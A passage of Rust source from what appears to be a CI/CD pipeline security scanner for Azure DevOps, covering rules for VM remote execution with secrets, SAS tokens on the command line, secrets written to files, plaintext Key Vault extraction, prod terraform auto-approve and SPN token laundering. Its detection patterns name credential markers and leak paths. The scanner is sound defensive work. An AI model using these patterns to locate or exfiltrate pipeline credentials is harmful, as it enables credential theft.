1838    VM_REMOTE_EXEC_TOKENS.iter().any(|t| body_lower.contains(t))
1839}
1840
1841/// Returns true if `body` contains any command-line sink keyword.
1842fn body_has_cmdline_sink(body_lower: &str) -> bool {
1843    COMMAND_LINE_SINK_TOKENS
1844        .iter()
1845        .any(|t| body_lower.contains(t))
1846}
1847
1848/// Extract names of PowerShell variables that are bound to a SAS-mint result.
1849/// Pattern: `$<name> = New-AzStorage...SASToken ...` (case-insensitive).
1850/// Returns the variable names without the leading `$`.
1851fn powershell_sas_assignments(body: &str) -> Vec<String> {
1852    let mut out = Vec::new();
1853    let lower = body.to_lowercase();
1854    let bytes = lower.as_bytes();
1855    let mut i = 0usize;
1856    while i < bytes.len() {
1857        if bytes[i] != b'$' {
1858            i += 1;
1859            continue;
1860        }
1861        // Read identifier
1862        let name_start = i + 1;
1863        let mut j = name_start;
1864        while j < bytes.len() {
1865            let c = bytes[j];
1866            if c.is_ascii_alphanumeric() || c == b'_' {
1867                j += 1;
1868            } else {
1869                break;
1870            }
1871        }
1872        if j == name_start {
1873            i += 1;
1874            continue;
1875        }
1876        // Skip whitespace, then expect `=`
1877        let mut k = j;
1878        while k < bytes.len() && (bytes[k] == b' ' || bytes[k] == b'\t') {
1879            k += 1;
1880        }
1881        if k >= bytes.len() || bytes[k] != b'=' {
1882            i = j;
1883            continue;
1884        }
1885        // Skip `=` and whitespace
1886        k += 1;
1887        while k < bytes.len() && (bytes[k] == b' ' || bytes[k] == b'\t') {
1888            k += 1;
1889        }
1890        // Look at the rest of this logical line (until `\n`).
1891        let line_end = lower[k..].find('\n').map(|p| k + p).unwrap_or(bytes.len());
1892        let rhs = &lower[k..line_end];
1893        if SAS_MINT_TOKENS.iter().any(|t| rhs.contains(t)) {
1894            // Recover original-case variable name from `body` at the same byte
1895            // offsets — `lower` and `body` share UTF-8 byte layout for ASCII,
1896            // and identifiers in PowerShell are ASCII in the corpus.
1897            let name = body
1898                .get(name_start..j)
1899                .unwrap_or(&lower[name_start..j])
1900                .to_string();
1901            if !out.iter().any(|n: &String| n.eq_ignore_ascii_case(&name)) {
1902                out.push(name);
1903            }
1904        }
1905        i = j;
1906    }
1907    out
1908}
1909
1910/// Rule: pipeline step uses an Azure VM remote-execution primitive
1911/// (Set-AzVMExtension/CustomScriptExtension, Invoke-AzVMRunCommand,
1912/// `az vm run-command invoke`, `az vm extension set`) where the executed
1913/// command line is constructed from a pipeline secret or a freshly-minted
1914/// SAS token.
1915///
1916/// Pipeline-to-VM lateral movement primitive: every pipeline run can RCE every
1917/// VM in scope, and the SAS/secret embedded in the command line is logged in
1918/// plaintext on the VM and in the ARM extension status JSON.
1919///
1920/// Detection: read each Step's `META_SCRIPT_BODY`. If the body contains a
1921/// remote-exec tool name AND (it interpolates a known pipeline secret variable
1922/// OR it mints a SAS token in the same body), fire one finding per step.
1923pub fn vm_remote_exec_via_pipeline_secret(graph: &AuthorityGraph) -> Vec<Finding> {
1924    let mut findings = Vec::new();
1925
1926    for step in graph.nodes_of_kind(NodeKind::Step) {
1927        let body = match step.metadata.get(META_SCRIPT_BODY) {
1928            Some(b) if !b.is_empty() => b,
1929            _ => continue,
1930        };
1931        let body_lower = body.to_lowercase();
1932        if !body_uses_vm_remote_exec(&body_lower) {
1933            continue;
1934        }
1935
1936        let secret_names = step_secret_var_names(graph, step.id);
1937        let secret_interpolated = secret_names
1938            .iter()
1939            .any(|name| body_interpolates_var(body, name));
1940        let mints_sas = body_mints_sas(&body_lower);
1941
1942        if !secret_interpolated && !mints_sas {
1943            continue;
1944        }
1945
1946        // Pick a single tool name for the message.
1947        let tool = VM_REMOTE_EXEC_TOKENS
1948            .iter()
1949            .find(|t| body_lower.contains(*t))
1950            .copied()
1951            .unwrap_or("Set-AzVMExtension");
1952
1953        let trigger = if secret_interpolated {
1954            "interpolating a pipeline secret into the executed command line"
1955        } else {
1956            "embedding a freshly-minted SAS token into the executed command line"
1957        };
1958
1959        let mut nodes_involved = vec![step.id];
1960        // Include the secret nodes the step has access to so consumers can
1961        // attribute the finding to the leaked credential.
1962        for edge in graph.edges_from(step.id) {
1963            if edge.kind == EdgeKind::HasAccessTo {
1964                if let Some(n) = graph.node(edge.to) {
1965                    if n.kind == NodeKind::Secret {
1966                        nodes_involved.push(n.id);
1967                    }
1968                }
1969            }
1970        }
1971
1972        findings.push(Finding {
1973            severity: Severity::High,
1974            category: FindingCategory::VmRemoteExecViaPipelineSecret,
1975            path: None,
1976            nodes_involved,
1977            message: format!(
1978                "Step '{}' uses {} {} — pipeline-to-VM RCE primitive; credential is logged on the VM and in ARM extension status",
1979                step.name, tool, trigger
1980            ),
1981            recommendation: Recommendation::Manual {
1982                action: "Stage the script on the VM and pass the SAS via env var or protectedSettings (encrypted, not logged); avoid embedding secrets in commandToExecute".into(),
1983            },
1984            source: FindingSource::BuiltIn,
1985                extras: FindingExtras::default(),
1986});
1987    }
1988
1989    findings
1990}
1991
1992/// Heuristic: line prefix looks like a bash/sh assignment to an env var.
1993/// Conservative — only matches when the LHS contains `<keyword>? IDENT=` and
1994/// nothing after the `=` other than optional opening quote characters.
1995fn matches_bash_assignment(lhs: &str) -> bool {
1996    // `export FOO=`, `declare FOO=`, `local FOO=`, `readonly FOO=`, plain `FOO=`
1997    let after_keyword = strip_one_of(lhs, &["export ", "declare ", "local ", "readonly "])
1998        .unwrap_or(lhs)
1999        .trim_start();
2000    // Allow trailing opening-quote characters between `=` and the secret ref.
2001    let trimmed = after_keyword.trim_end_matches(['"', '\'']);
2002    let Some(ident) = trimmed.strip_suffix('=') else {
2003        return false;
2004    };
2005    !ident.is_empty()
2006        && ident.chars().all(is_shell_var_char)
2007        && !ident.starts_with(|c: char| c.is_ascii_digit())
2008}
2009
/// Heuristic: does this line prefix look like a PowerShell assignment?
///
/// Two shapes are recognised:
///   - `$VAR =`, `$env:VAR =`, `${VAR} =` — the prefix starts with `$` and,
///     ignoring trailing whitespace and opening quotes, ends with `=`
///   - `Set-Variable ... -Value` — matched case-insensitively, because
///     PowerShell cmdlet and parameter names are not case-sensitive
///
/// The caller is expected to have trimmed leading whitespace from `lhs`.
fn matches_powershell_assignment(lhs: &str) -> bool {
    // Strip trailing opening quote and whitespace so `$x = "$(SECRET)` matches.
    let trimmed = lhs.trim_end().trim_end_matches(['"', '\'']).trim_end();
    if let Some(before_eq) = trimmed.strip_suffix('=') {
        if before_eq.trim_end().starts_with('$') {
            return true;
        }
    }
    // `Set-Variable ... -Value`, in any letter case.
    let lowered = trimmed.to_ascii_lowercase();
    lowered.contains("set-variable") && lowered.contains("-value")
}
2026
/// True for characters allowed in a shell variable name: ASCII letters,
/// ASCII digits and `_`.
fn is_shell_var_char(c: char) -> bool {
    matches!(c, 'a'..='z' | 'A'..='Z' | '0'..='9' | '_')
}
2030
/// Removes the first entry of `prefixes` (in slice order) that `s` starts
/// with and returns the remainder, or `None` when no entry matches.
fn strip_one_of<'a>(s: &'a str, prefixes: &[&str]) -> Option<&'a str> {
    prefixes.iter().find_map(|prefix| s.strip_prefix(*prefix))
}
2039
2040/// Rule: pipeline secret exported via shell variable inside an inline script.
2041///
2042/// Severity: High. ADO masks the literal token `$(SECRET)` when it appears in
2043/// log output, but masking happens on the rendered command string before the
2044/// shell runs. Once the value is bound to a shell variable, downstream
2045/// transcripts (`Start-Transcript`, `bash -x`, terraform `TF_LOG=DEBUG`,
2046/// `az --debug`) print the cleartext.
2047pub fn secret_to_inline_script_env_export(graph: &AuthorityGraph) -> Vec<Finding> {
2048    let mut findings = Vec::new();
2049
2050    for step in graph.nodes_of_kind(NodeKind::Step) {
2051        let Some(script) = step.metadata.get(META_SCRIPT_BODY) else {
2052            continue;
2053        };
2054        if script.is_empty() {
2055            continue;
2056        }
2057        let secrets = step_secret_names(graph, step.id);
2058        let exposed: Vec<String> = secrets
2059            .into_iter()
2060            .filter(|s| script_assigns_secret_to_shell_var(script, s))
2061            .collect();
2062
2063        if exposed.is_empty() {
2064            continue;
2065        }
2066
2067        let n = exposed.len();
2068        let preview: String = exposed
2069            .iter()
2070            .take(3)
2071            .map(|s| format!("$({s})"))
2072            .collect::<Vec<_>>()
2073            .join(", ");
2074        let suffix = if n > 3 {
2075            format!(", and {} more", n - 3)
2076        } else {
2077            String::new()
2078        };
2079        let secret_node_ids: Vec<NodeId> = graph
2080            .edges_from(step.id)
2081            .filter(|e| e.kind == EdgeKind::HasAccessTo)
2082            .filter_map(|e| graph.node(e.to))
2083            .filter(|n| n.kind == NodeKind::Secret && exposed.contains(&n.name))
2084            .map(|n| n.id)
2085            .collect();
2086
2087        let mut nodes_involved = vec![step.id];
2088        nodes_involved.extend(secret_node_ids);
2089
2090        findings.push(Finding {
2091            severity: Severity::High,
2092            category: FindingCategory::SecretToInlineScriptEnvExport,
2093            path: None,
2094            nodes_involved,
2095            message: format!(
2096                "Step '{}' assigns pipeline secret(s) {preview}{suffix} to shell variables inside an inline script — once bound to a variable the value bypasses ADO's $(SECRET) log mask and will appear in any transcript (Start-Transcript, bash -x, terraform/az --debug)",
2097                step.name
2098            ),
2099            recommendation: Recommendation::TsafeRemediation {
2100                command: "tsafe exec --ns <scoped-namespace> -- <command>".to_string(),
2101                explanation: "Inject the secret as an env var on the step itself (ADO `env:` block) instead of materialising it inside the script body. The value still reaches the process but never travels through a shell variable assignment that transcripts can capture.".to_string(),
2102            },
2103            source: FindingSource::BuiltIn,
2104                extras: FindingExtras::default(),
2105});
2106    }
2107
2108    findings
2109}
2110
/// How a `resources.repositories[].ref` value resolves. Produced by
/// `classify_repository_ref` and consumed by both the
/// `template_extends_unpinned_branch` and
/// `template_repo_ref_is_feature_branch` rules.
enum RepositoryRefClass {
    /// SHA-pinned (bare hex SHA or `refs/heads/<sha>`) or tag-pinned
    /// (`refs/tags/<x>`) — code at the consumer is treated as immutable.
    Pinned,
    /// No `ref:` field (or a blank one) — resolves to the repo's default branch.
    DefaultBranch,
    /// `refs/heads/<name>` or bare branch — mutable. Carries the branch name
    /// with any leading `refs/heads/` removed.
    MutableBranch(String),
}
2121
2122fn classify_repository_ref(ref_value: Option<&str>) -> RepositoryRefClass {
2123    let raw = match ref_value {
2124        None => return RepositoryRefClass::DefaultBranch,
2125        Some(s) if s.trim().is_empty() => return RepositoryRefClass::DefaultBranch,
2126        Some(s) => s.trim(),
2127    };
2128
2129    // Bare 40+ hex SHA — pinned.
2130    if is_hex_sha(raw) {
2131        return RepositoryRefClass::Pinned;
2132    }
2133
2134    // refs/tags/<x> — pinned.
2135    if let Some(tag) = raw.strip_prefix("refs/tags/") {
2136        if !tag.is_empty() {
2137            return RepositoryRefClass::Pinned;
2138        }
2139    }
2140
2141    // refs/heads/<x> — mutable, unless trailing segment is a SHA.
2142    if let Some(branch) = raw.strip_prefix("refs/heads/") {
2143        if is_hex_sha(branch) {
2144            return RepositoryRefClass::Pinned;
2145        }
2146        return RepositoryRefClass::MutableBranch(branch.to_string());
2147    }
2148
2149    // Bare value — treat as a branch name.
2150    RepositoryRefClass::MutableBranch(raw.to_string())
2151}
2152
/// True when `s` is at least 40 bytes long and consists solely of ASCII hex
/// digits (either case) — the shape of a full commit SHA.
fn is_hex_sha(s: &str) -> bool {
    if s.len() < 40 {
        return false;
    }
    s.bytes().all(|b| b.is_ascii_hexdigit())
}
2156
2157/// Rule: a SAS token minted in-pipeline is passed as a CLI argument or
2158/// interpolated into `commandToExecute` / `scriptArguments` / `--arguments` /
2159/// `-ArgumentList` rather than via env var or stdin.
2160///
2161/// Even short-lived SAS tokens in argv hit Linux `/proc/*/cmdline`, Windows
2162/// ETW process-create events, and ARM extension status — logged for the
2163/// SAS lifetime.
2164///
2165/// Detection: read each Step's `META_SCRIPT_BODY`. Body must (a) mint a SAS
2166/// token AND (b) reference a command-line sink keyword. Heuristic acceptable:
2167/// the goal is to catch the corpus pattern, not perfect specificity.
2168pub fn short_lived_sas_in_command_line(graph: &AuthorityGraph) -> Vec<Finding> {
2169    let mut findings = Vec::new();
2170
2171    for step in graph.nodes_of_kind(NodeKind::Step) {
2172        let body = match step.metadata.get(META_SCRIPT_BODY) {
2173            Some(b) if !b.is_empty() => b,
2174            _ => continue,
2175        };
2176        let body_lower = body.to_lowercase();
2177
2178        if !body_mints_sas(&body_lower) {
2179            continue;
2180        }
2181        if !body_has_cmdline_sink(&body_lower) {
2182            continue;
2183        }
2184
2185        // Tighten precision: at least one minted-SAS variable must actually
2186        // appear interpolated somewhere in the script body. This filters out
2187        // scripts that mint a SAS purely for upload-to-blob and never put it
2188        // on argv.
2189        let sas_vars = powershell_sas_assignments(body);
2190        let mut interpolated_var: Option<String> = None;
2191        for v in &sas_vars {
2192            if body_interpolates_var(body, v) {
2193                interpolated_var = Some(v.clone());
2194                break;
2195            }
2196        }
2197        // If we couldn't bind a SAS var (e.g. inline `az`-CLI subshell), fall
2198        // back to "mint+sink in same script" — still better than no signal.
2199        let evidence = interpolated_var
2200            .as_deref()
2201            .map(|v| format!("$ {v} interpolated into argv"))
2202            .unwrap_or_else(|| "SAS-mint and command-line sink in same script".to_string());
2203
2204        findings.push(Finding {
2205            severity: Severity::Medium,
2206            category: FindingCategory::ShortLivedSasInCommandLine,
2207            path: None,
2208            nodes_involved: vec![step.id],
2209            message: format!(
2210                "Step '{}' mints a SAS token and passes it on the command line ({}) — argv lands in /proc, ETW, and ARM extension status for the token's lifetime",
2211                step.name, evidence
2212            ),
2213            recommendation: Recommendation::Manual {
2214                action: "Pass the SAS via env var, stdin, or VM-extension protectedSettings; never put SAS tokens in commandToExecute / --arguments / -ArgumentList".into(),
2215            },
2216            source: FindingSource::BuiltIn,
2217                extras: FindingExtras::default(),
2218});
2219    }
2220
2221    findings
2222}
2223
/// Returns true if `line` contains a sink that writes content to a file
/// path. Recognises the common bash and PowerShell "write to file" idioms:
///
///   - bash (case-sensitive): ` > `, ` >> `, `>/...`, `>>/...`, `| tee ...`,
///     or a line that starts with `tee `
///   - PowerShell (case-insensitive): `Out-File`, `Set-Content`,
///     `Add-Content`, `WriteAllText`, `WriteAllLines`
fn line_writes_to_file(line: &str) -> bool {
    // `>>/` and `| tee -` need no entries of their own: any line containing
    // them also contains `>/` or `| tee ` respectively.
    const SHELL_SINKS: [&str; 4] = [" > ", " >> ", ">/", "| tee "];
    const POWERSHELL_SINKS: [&str; 5] = [
        "out-file",
        "set-content",
        "add-content",
        "writealltext",
        "writealllines",
    ];

    if line.starts_with("tee ") || SHELL_SINKS.iter().any(|sink| line.contains(*sink)) {
        return true;
    }

    let lowered = line.to_lowercase();
    POWERSHELL_SINKS.iter().any(|sink| lowered.contains(*sink))
}
2251
/// Reports whether `line` mentions an agent directory macro or a file
/// extension that is considered risky for secret materialisation.
///
/// Matching is a case-insensitive substring search, so an extension such as
/// `.env` also matches when it is merely a prefix of a longer word.
fn line_references_workspace_path(line: &str) -> bool {
    // Agent directory macros, stored lower-cased.
    // NOTE(review): `$(Agent.TempDirectory)` is treated as a risky location
    // here, while the recommendation text emitted by
    // `secret_materialised_to_workspace_file` suggests writing there —
    // confirm which is intended.
    const WORKSPACE_MACROS: [&str; 5] = [
        "$(system.defaultworkingdirectory)",
        "$(build.sourcesdirectory)",
        "$(pipeline.workspace)",
        "$(agent.builddirectory)",
        "$(agent.tempdirectory)",
    ];
    // Common credential / config file extensions.
    const RISKY_EXT: [&str; 11] = [
        ".tfvars",
        ".env",
        ".hcl",
        ".pfx",
        ".key",
        ".pem",
        ".crt",
        ".p12",
        ".kubeconfig",
        ".jks",
        ".keystore",
    ];

    let folded = line.to_lowercase();
    WORKSPACE_MACROS
        .iter()
        .chain(RISKY_EXT.iter())
        .any(|&needle| folded.contains(needle))
}
2280
2281/// Heuristic: returns true if `script` materialises `secret` to a workspace
2282/// file. Looks for a single line that contains the secret reference AND a
2283/// "write to file" sink AND a workspace/credfile path target.
2284///
2285/// Also detects the heredoc + Out-File pattern across multiple lines:
2286/// the secret appears inside a `@" ... "@` block whose final pipe is
2287/// `Out-File <workspace-path>`.
2288fn script_materialises_secret_to_file(script: &str, secret: &str) -> bool {
2289    let needle = format!("$({secret})");
2290
2291    // Pass 1: single-line write. Catches `echo $(SECRET) > /tmp/x.env`,
2292    // `Out-File ... $(SECRET) ...`, etc.
2293    for line in script.lines() {
2294        if line.contains(&needle)
2295            && line_writes_to_file(line)
2296            && line_references_workspace_path(line)
2297        {
2298            return true;
2299        }
2300    }
2301
2302    // Pass 2: PowerShell pattern `$X = "$(SECRET)"` followed by the variable
2303    // being piped into Out-File / Set-Content with a workspace path. We
2304    // detect this conservatively: if any line assigns `$x = "$(SECRET)"`
2305    // AND any *later* line both writes-to-file and references a workspace
2306    // path, we flag it. False-positive risk is low because the ASLR-style
2307    // `$x` typically won't be reused for unrelated content within the same
2308    // inline block.
2309    let mut secret_bound_to_var = false;
2310    for line in script.lines() {
2311        let trimmed = line.trim();
2312        if !secret_bound_to_var
2313            && trimmed.contains(&needle)
2314            && trimmed.starts_with('$')
2315            && trimmed.contains('=')
2316        {
2317            secret_bound_to_var = true;
2318            continue;
2319        }
2320        if secret_bound_to_var && line_writes_to_file(line) && line_references_workspace_path(line)
2321        {
2322            return true;
2323        }
2324    }
2325
2326    false
2327}
2328
2329/// Rule: pipeline secret materialised to a file under the agent workspace.
2330///
2331/// Severity: High. Files written under `$(System.DefaultWorkingDirectory)` /
2332/// `$(Build.SourcesDirectory)` survive the writing step's lifetime, are
2333/// uploaded by `PublishPipelineArtifact` tasks (sometimes accidentally), and
2334/// remain readable by every subsequent step in the same job.
2335pub fn secret_materialised_to_workspace_file(graph: &AuthorityGraph) -> Vec<Finding> {
2336    let mut findings = Vec::new();
2337
2338    for step in graph.nodes_of_kind(NodeKind::Step) {
2339        let Some(script) = step.metadata.get(META_SCRIPT_BODY) else {
2340            continue;
2341        };
2342        if script.is_empty() {
2343            continue;
2344        }
2345        let secrets = step_secret_names(graph, step.id);
2346        let materialised: Vec<String> = secrets
2347            .into_iter()
2348            .filter(|s| script_materialises_secret_to_file(script, s))
2349            .collect();
2350
2351        if materialised.is_empty() {
2352            continue;
2353        }
2354
2355        let n = materialised.len();
2356        let preview: String = materialised
2357            .iter()
2358            .take(3)
2359            .map(|s| format!("$({s})"))
2360            .collect::<Vec<_>>()
2361            .join(", ");
2362        let suffix = if n > 3 {
2363            format!(", and {} more", n - 3)
2364        } else {
2365            String::new()
2366        };
2367
2368        let secret_node_ids: Vec<NodeId> = graph
2369            .edges_from(step.id)
2370            .filter(|e| e.kind == EdgeKind::HasAccessTo)
2371            .filter_map(|e| graph.node(e.to))
2372            .filter(|n| n.kind == NodeKind::Secret && materialised.contains(&n.name))
2373            .map(|n| n.id)
2374            .collect();
2375
2376        let mut nodes_involved = vec![step.id];
2377        nodes_involved.extend(secret_node_ids);
2378
2379        findings.push(Finding {
2380            severity: Severity::High,
2381            category: FindingCategory::SecretMaterialisedToWorkspaceFile,
2382            path: None,
2383            nodes_involved,
2384            message: format!(
2385                "Step '{}' writes pipeline secret(s) {preview}{suffix} to a file under the agent workspace — the file persists for the rest of the job, is readable by every subsequent step, and may be uploaded by PublishPipelineArtifact",
2386                step.name
2387            ),
2388            recommendation: Recommendation::Manual {
2389                action: "Replace inline secret materialisation with the `secureFile` task (downloaded to a temp dir with 0600 perms and auto-deleted), or pass the secret to the consuming tool over stdin / an env var instead of via a workspace file. If a file is unavoidable, write under `$(Agent.TempDirectory)` and `chmod 600` immediately.".into(),
2390            },
2391            source: FindingSource::BuiltIn,
2392                extras: FindingExtras::default(),
2393});
2394    }
2395
2396    findings
2397}
2398
/// Reports whether `script` contains a Key Vault → plaintext extraction
/// pattern that lands the secret in a non-`SecureString` value.
///
/// The check is a case-insensitive, whole-script substring test; the
/// markers do not have to appear on the same line. Recognised combinations:
///
/// * `Get-AzKeyVaultSecret` together with `-AsPlainText` (new syntax),
/// * `ConvertFrom-SecureString` together with `-AsPlainText` (PS 7+),
/// * `Get-AzKeyVaultSecret` together with `.SecretValueText` (old syntax),
/// * `Get-AzKeyVaultSecret` together with `PtrToStringAuto` (BSTR pattern).
fn script_extracts_keyvault_to_plaintext(script: &str) -> bool {
    let folded = script.to_lowercase();
    let mentions = |marker: &str| folded.contains(marker);

    let fetches_secret = mentions("get-azkeyvaultsecret");
    let as_plain_text = mentions("-asplaintext");

    (as_plain_text && (fetches_secret || mentions("convertfrom-securestring")))
        || (fetches_secret && (mentions(".secretvaluetext") || mentions("ptrtostringauto")))
}
2421
2422/// Rule: PowerShell pulls a Key Vault secret as plaintext inside an inline
2423/// script. The value never crosses the ADO variable-group boundary so
2424/// pipeline log masking does not apply — verbose `Az` / PowerShell logging
2425/// (`Set-PSDebug -Trace`, `$VerbosePreference = "Continue"`, error stack
2426/// traces) will print the cleartext credential.
2427///
2428/// Severity: Medium. Lower than the materialisation rules because the value
2429/// is at least kept in process memory (vs. on disk), but still a real
2430/// exposure path that pipeline-level secret rotation alone does not fix.
2431pub fn keyvault_secret_to_plaintext(graph: &AuthorityGraph) -> Vec<Finding> {
2432    let mut findings = Vec::new();
2433
2434    for step in graph.nodes_of_kind(NodeKind::Step) {
2435        let Some(script) = step.metadata.get(META_SCRIPT_BODY) else {
2436            continue;
2437        };
2438        if script.is_empty() {
2439            continue;
2440        }
2441        if !script_extracts_keyvault_to_plaintext(script) {
2442            continue;
2443        }
2444
2445        findings.push(Finding {
2446            severity: Severity::Medium,
2447            category: FindingCategory::KeyVaultSecretToPlaintext,
2448            path: None,
2449            nodes_involved: vec![step.id],
2450            message: format!(
2451                "Step '{}' extracts a Key Vault secret as plaintext inside an inline script (-AsPlainText / .SecretValueText) — value bypasses ADO variable-group masking and is printed by Az verbose logging or any error stack trace",
2452                step.name
2453            ),
2454            recommendation: Recommendation::Manual {
2455                action: "Keep the secret as a `SecureString`: drop `-AsPlainText`, pass the SecureString directly to cmdlets that accept it (e.g. `New-PSCredential`, `Connect-AzAccount -ServicePrincipal -Credential ...`), and only convert to plaintext at the moment of consumption, scoped to a single expression. For values that must be plaintext (REST calls, env vars) prefer ADO variable groups linked to Key Vault — the value then participates in pipeline log masking.".into(),
2456            },
2457            source: FindingSource::BuiltIn,
2458                extras: FindingExtras::default(),
2459});
2460    }
2461
2462    findings
2463}
2464
/// Returns true when `name` (case-insensitive) looks like a production
/// service-connection name.
///
/// The name is split on `-` and `_`; it matches when any resulting segment
/// is exactly `prod`, `production` or `prd`. That covers the whole name
/// (`prod`), a leading/trailing segment (`prod-foo`, `foo_prd`) and an inner
/// segment, including names that mix the two separators (`svc_prod-eu`).
///
/// Conservative by design: only whole segments count, so substrings such as
/// "approver" or "reproduce" do not match, and no other separator (space,
/// `.`) is recognised.
fn looks_like_prod_connection(name: &str) -> bool {
    const PROD_TOKENS: [&str; 3] = ["prod", "production", "prd"];

    name.to_lowercase()
        .split(['-', '_'])
        .any(|segment| PROD_TOKENS.contains(&segment))
}
2483
/// Returns true when an inline script body looks like it is laundering
/// federated SPN/OIDC token material into a pipeline variable via
/// `##vso[task.setvariable]`. Used to escalate `addspn_with_inline_script`'s
/// message wording when explicit laundering is detected.
///
/// Both conditions are case-insensitive, whole-script substring checks: the
/// script must contain a `##vso[task.setvariable` directive AND mention at
/// least one well-known token marker. The two are not required to sit on the
/// same line.
fn script_launders_spn_token(s: &str) -> bool {
    // Stored lower-cased; compared against a lower-cased copy of the script.
    const TOKEN_MARKERS: [&str; 8] = [
        "$env:idtoken",
        "$env:serviceprincipalkey",
        "$env:serviceprincipalid",
        "$env:tenantid",
        "arm_oidc_token",
        "arm_client_id",
        "arm_client_secret",
        "arm_tenant_id",
    ];

    let folded = s.to_lowercase();
    folded.contains("##vso[task.setvariable")
        && TOKEN_MARKERS.iter().any(|&marker| folded.contains(marker))
}
2505
2506/// Rule: `terraform apply -auto-approve` against a production service
2507/// connection without an environment approval gate.
2508///
2509/// Combines three signals on a Step node:
2510///   1. `META_TERRAFORM_AUTO_APPROVE` = "true" (set by the parser when an
2511///      inline script runs `terraform apply --auto-approve`, or a
2512///      `TerraformCLI@N` task has `command: apply` + commandOptions
2513///      containing `auto-approve`).
2514///   2. `META_SERVICE_CONNECTION_NAME` matches a production-named pattern
2515///      (`prod`, `production`, `prd`), OR the step is linked via
2516///      `HasAccessTo` to an Identity service-connection node whose name
2517///      matches that pattern.
2518///   3. The step is NOT inside an `environment:`-bound deployment job
2519///      (parser sets `META_ENV_APPROVAL` for those steps).
2520///
2521/// Severity: Critical. Bypasses the only ADO-side change-control on
2522/// infra rewrites.
2523pub fn terraform_auto_approve_in_prod(graph: &AuthorityGraph) -> Vec<Finding> {
2524    let mut findings = Vec::new();
2525
2526    for step in graph.nodes_of_kind(NodeKind::Step) {
2527        let auto_approve = step
2528            .metadata
2529            .get(META_TERRAFORM_AUTO_APPROVE)
2530            .map(|v| v == "true")
2531            .unwrap_or(false);
2532        if !auto_approve {
2533            continue;
2534        }
2535
2536        // Step's own service-connection name (set by parser from
2537        // azureSubscription / connectedServiceName / etc).
2538        let direct_conn = step.metadata.get(META_SERVICE_CONNECTION_NAME).cloned();
2539
2540        // Walk HasAccessTo edges to find a service-connection Identity. This
2541        // catches steps that don't carry the name on themselves but inherit
2542        // an Identity node via the parser's edge.
2543        let edge_conn = graph
2544            .edges_from(step.id)
2545            .filter(|e| e.kind == EdgeKind::HasAccessTo)
2546            .filter_map(|e| graph.node(e.to))
2547            .find(|n| {
2548                n.kind == NodeKind::Identity
2549                    && n.metadata
2550                        .get(META_SERVICE_CONNECTION)
2551                        .map(|v| v == "true")
2552                        .unwrap_or(false)
2553            })
2554            .map(|n| n.name.clone());
2555
2556        let conn_name = match direct_conn.or(edge_conn) {
2557            Some(n) if looks_like_prod_connection(&n) => n,
2558            _ => continue,
2559        };
2560
2561        // Compensating control: an `environment:` binding routes the apply
2562        // through ADO's approval / check pipeline. Whether that environment
2563        // *actually* has approvers configured is invisible from YAML — so
2564        // downgrade Critical → Medium instead of skipping outright (the
2565        // previous behaviour silently dropped the finding even when the
2566        // environment was a CI-only approval-free passthrough).
2567        let env_gated = step
2568            .metadata
2569            .get(META_ENV_APPROVAL)
2570            .map(|v| v == "true")
2571            .unwrap_or(false);
2572        let (severity, suffix) = if env_gated {
2573            (
2574                Severity::Medium,
2575                " — `environment:` binding present (verify approvers are configured in the ADO Environments UI)",
2576            )
2577        } else {
2578            (
2579                Severity::Critical,
2580                " — any committer can rewrite prod infrastructure",
2581            )
2582        };
2583
2584        findings.push(Finding {
2585            severity,
2586            category: FindingCategory::TerraformAutoApproveInProd,
2587            path: None,
2588            nodes_involved: vec![step.id],
2589            message: format!(
2590                "Step '{}' runs `terraform apply -auto-approve` against production service connection '{}'{}",
2591                step.name, conn_name, suffix
2592            ),
2593            recommendation: Recommendation::Manual {
2594                action: "Move the apply step into a deployment job whose `environment:` is configured with required approvers in ADO, OR remove `-auto-approve` and run apply behind a manual checkpoint task. Combine with a non-shared agent pool so committers cannot pre-stage payloads.".into(),
2595            },
2596            source: FindingSource::BuiltIn,
2597                extras: FindingExtras::default(),
2598});
2599    }
2600
2601    findings
2602}
2603
2604/// Rule: `AzureCLI@2` task with `addSpnToEnvironment: true` AND an inline
2605/// script body. The inline script can launder federated SPN material
2606/// (`$env:idToken`, `$env:servicePrincipalKey`, `$env:tenantId`) into normal
2607/// pipeline variables via `##vso[task.setvariable]`, leaking OIDC tokens to
2608/// downstream tasks/artifacts un-masked.
2609///
2610/// Severity: High. Escalates message wording when the script body contains
2611/// explicit laundering patterns (`##vso[task.setvariable ...]` writing one
2612/// of the well-known token env vars or `ARM_OIDC_TOKEN`).
2613pub fn addspn_with_inline_script(graph: &AuthorityGraph) -> Vec<Finding> {
2614    let mut findings = Vec::new();
2615
2616    for step in graph.nodes_of_kind(NodeKind::Step) {
2617        let add_spn = step
2618            .metadata
2619            .get(META_ADD_SPN_TO_ENV)
2620            .map(|v| v == "true")
2621            .unwrap_or(false);
2622        if !add_spn {
2623            continue;
2624        }
2625
2626        let body = match step.metadata.get(META_SCRIPT_BODY) {
2627            Some(b) if !b.trim().is_empty() => b,
2628            _ => continue,
2629        };
2630
2631        let launders = script_launders_spn_token(body);
2632        let suffix = if launders {
2633            " — explicit token laundering detected (##vso[task.setvariable] writes federated token material)"
2634        } else {
2635            ""
2636        };
2637
2638        findings.push(Finding {
2639            severity: Severity::High,
2640            category: FindingCategory::AddSpnWithInlineScript,
2641            path: None,
2642            nodes_involved: vec![step.id],
2643            message: format!(
2644                "Step '{}' runs an inline script with addSpnToEnvironment:true — the federated SPN (idToken/servicePrincipalKey/tenantId) is exposed to script-controlled code and can be exfiltrated via setvariable{}",
2645                step.name, suffix
2646            ),
2647            recommendation: Recommendation::Manual {
2648                action: "Replace the inline script with `scriptPath:` pointing to a reviewed file in-repo, OR drop `addSpnToEnvironment: true` and use the task's first-class auth surface. Never emit federated token material via `##vso[task.setvariable]` — those values are inherited by every downstream task and may appear in logs.".into(),
2649            },
2650            source: FindingSource::BuiltIn,
2651                extras: FindingExtras::default(),
2652});
2653    }
2654
2655    findings
2656}
2657
2658/// Rule: free-form `type: string` parameter (no `values:` allowlist)
2659/// interpolated via `${{ parameters.<name> }}` directly into an inline
2660/// shell/PowerShell script body. ADO does not escape parameter values in
2661/// YAML emission, so any user with "queue build" can inject shell.
2662///
2663/// Detection requires the parser to populate
2664/// `AuthorityGraph::parameters` (currently ADO only) and to stamp Step
2665/// nodes with `META_SCRIPT_BODY`.
2666///
2667/// Severity: Medium.
2668pub fn parameter_interpolation_into_shell(graph: &AuthorityGraph) -> Vec<Finding> {
2669    if graph.parameters.is_empty() {
2670        return Vec::new();
2671    }
2672
2673    // Free-form string parameters: type is `string` (or unspecified — ADO's
2674    // default) AND no `values:` allowlist.
